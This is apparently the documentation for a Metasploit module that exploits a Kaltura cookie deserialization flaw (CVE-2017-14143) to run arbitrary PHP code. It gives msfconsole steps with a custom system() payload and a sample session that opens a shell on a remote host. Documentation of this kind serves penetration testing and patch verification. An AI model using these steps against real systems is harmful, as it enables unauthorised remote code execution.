## Description 

The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie. 
 

## Vulnerable Application

 This module exploits a remote code execution within the Kaltura(<=13.1.0) via a cookie deserialization.
 Vulnerability reference- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143.
 Installation of Kaltura is difficult, but here is an installation guide:
 https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md


## Verification Steps

 1. Start msfconsole
 2. `use exploit/linux/http/kaltura_unserialize_cookie_rce`
 3. `set RHOST https://example.com (or IP address)`
 4. `set ENTRYID 0_xxxxxxxx`
 5. `set payload generic/custom`
 6. `set payloadstr "system('command you want to execute, eg.- ls -la');"`
 7. `run`

## Scenarios

 ```
 msf use exploits/linux/http/kaltura_unserialize_cookie_rce
 msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
 RHOST => 46.101.209.202
 msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
 LHOST => 192.168.1.16
 msf exploit(kalkutra_unseialize_cookie_rce)>check
 [+] 46.101.209.202:4444 The target is vulnerable.
 msf exploit(kalkutra_unseialize_cookie_rce)>run
 [*] Started bind handler
 [*] Output:
 [*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200

 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
  ```

